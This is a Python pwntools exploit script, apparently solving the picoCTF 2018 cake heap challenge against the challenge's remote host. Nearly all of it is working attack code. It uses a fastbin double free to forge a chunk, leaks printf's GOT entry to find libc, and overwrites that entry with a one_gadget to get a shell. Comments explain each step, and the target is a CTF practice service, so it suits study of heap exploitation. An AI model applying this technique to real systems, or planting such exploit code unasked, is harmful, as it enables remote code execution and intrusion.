  1. #!/bin/python2
  2. from pwn import *
  3. import re
  4.  
# pwntools: terminal emulator used when it spawns a gdb/attach window.
context.terminal = ['termite', '-e']

# Module-wide counter of cakes created through alloc(); it mirrors the slot
# index the target assigns to each new cake so free()/leak() can address it.
cidx = 0
  7.  
def alloc(p, name, price):
    """Create a cake ("M" command) with `name` and `price`; return its slot index.

    The index comes from the module-level counter `cidx`, which counts cakes
    created through this helper; the target is assumed to hand out slots in the
    same order.  `price` is sent as a decimal string, `name` verbatim (it may be
    raw packed bytes).  Returns the index that was current before incrementing.
    """
    global cidx
    p.sendline("M")
    p.sendlineafter("Name>", name)
    p.sendlineafter("Price>", str(price))
    idx = cidx
    cidx += 1
    return idx
  15.  
def free(p, i):
    """Serve cake `i` to a customer ("S" command), which frees its chunk.

    break_heap() relies on serving the same cake twice, i.e. on the target not
    clearing the slot (a double free).  The acknowledgement line echoed by the
    target embeds the cake's name; the literal expected here has an empty name,
    so only cakes created with name == "" can be freed through this helper.
    """
    prompt = "This customer looks really hungry. Which cake would you like to give them?"
    ack = "The customer looks really happy with !"
    p.sendline("S")
    p.sendlineafter(prompt, str(i))
    p.recvuntil(ack)
  20.  
def leak(p, i):
    """Inspect cake `i` ("I" command) and return its price as an int.

    The target answers with a line of the form "... is being sold for $<n>";
    the text after the last '$' is parsed.  In the exploit the price field of
    a forged cake overlays a GOT entry, so the returned value is a leaked
    pointer.  Pending output is flushed first so the reply line is not
    confused with earlier chatter.
    """
    p.clean()
    p.sendline("I")
    p.sendlineafter("Which one?", str(i))
    line = p.recvline_contains("is being sold for")
    _, _, amount = line.rpartition('$')
    return int(amount)
  28.  
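def break_heap():
    """Pop a shell on the picoCTF 2018 cake service via a fastbin double free.

    Outline (every address below is hard-coded for the challenge binary, which
    is non-PIE, and for the libc build on the remote host — `printf_off` and
    `one_gadget` must be recomputed for any other libc):

      1. fastbin dup (free A, free B, free A) and link a fake chunk sitting just
         below the `shop` struct into the 0x20 fastbin;
      2. allocate the fake chunk, point cakes[0] at printf's GOT entry and read
         it back with the "I" command -> libc base;
      3. repeat the dup, NULL cakes[0], then use one more allocation of the fake
         chunk to write one_gadget into printf's GOT entry;
      4. p.interactive() — the next printf call jumps to the gadget.

    Packed pointers use "<Q" (explicit 8-byte little-endian); the original "L"
    format is native-sized and would emit 4 bytes on some platforms, silently
    truncating the name payload.  Returns nothing; leaves the caller in an
    interactive session.
    """
    p = remote('2018shell2.picoctf.com', 42542)

    shop = 0x6030e0        # address of the shop struct (.bss, non-PIE)
    printf_got = 0x603048  # printf's GOT entry (a .got.plt slot, not the PLT stub)
    printf_off = 0x55800   # printf offset from libc base — remote libc only
    one_gadget = 0x45216   # one_gadget execve("/bin/sh") offset — remote libc only

    # Step 1: fastbin dup.  The fake chunk starts at shop-0x8, so the word at
    # `shop` is its size field and must read 0x21 to pass malloc's fastbin
    # size check.  Per the author's note that value is reached through the
    # target's sales accounting of the prices 16 and 17 — the exact mechanism
    # lives in the binary; verify it if the bin size ever differs.
    A = alloc(p, "", 16)
    B = alloc(p, "", 17)
    free(p, A)  # A->fd = NULL, A is the fastbin head
    free(p, B)  # B->fd = A,    B is the fastbin head
    free(p, A)  # A->fd = B,    A is the fastbin head again (A listed twice);
                # freeing B in between defeats glibc's "fasttop" double-free check
    # First malloc hands back A; its price field overlays A->fd, so the price
    # becomes the bin's "next" pointer and links the fake chunk into the bin.
    C = alloc(p, "", shop - 0x8)

    D = alloc(p, "", 0)  # returns B
    E = alloc(p, "", 0)  # returns A (its second copy)
    # Next malloc returns the fake chunk's user data at shop+0x8.  Its price
    # overlays the word at shop+0x8 ("customers" in the author's notes);
    # setting it to shop-0x8 makes the fake chunk's fd point at itself, so it
    # can be handed out twice in a row later.  The 8-byte name overlays
    # cakes[0] and points it at printf's GOT entry.
    F = alloc(p, struct.pack("<Q", printf_got), shop - 0x8)

    # Step 2: "I" prints cakes[0]->price, i.e. the 8 bytes stored at printf's
    # GOT entry — printf's runtime address.
    libc = leak(p, 0) - printf_off
    log.info('libc base is at: ' + hex(libc))

    # Step 3: same dup with D and E, linking the fake chunk once more.
    free(p, D)  # D->fd = NULL, D is the fastbin head
    free(p, E)  # E->fd = D,    E is the fastbin head
    free(p, D)  # D->fd = E,    D is the fastbin head (double free again)
    G = alloc(p, "", shop - 0x8)  # returns D; its price -> D->fd = fake chunk

    H = alloc(p, "", 0)  # returns E
    I = alloc(p, "", 0)  # returns D
    # Returns shop+0x8: the name NULLs cakes[0], the price zeroes shop+0x8.
    J = alloc(p, struct.pack("<Q", 0), 0)
    # Returns shop+0x8 again (the fake chunk was self-linked by F).  Per the
    # author's notes the new cake lands in the now-empty slot cakes[0]; its
    # name write re-points cakes[0] at printf's GOT entry, so the following
    # price write goes through cakes[0] into the GOT: printf -> one_gadget.
    K = alloc(p, struct.pack("<Q", printf_got), libc + one_gadget)

    p.interactive()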
  75.  
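# Only fire the exploit when run as a script, so the helpers above can be
# imported (e.g. for local testing against the binary) without connecting.
if __name__ == "__main__":
    break_heap()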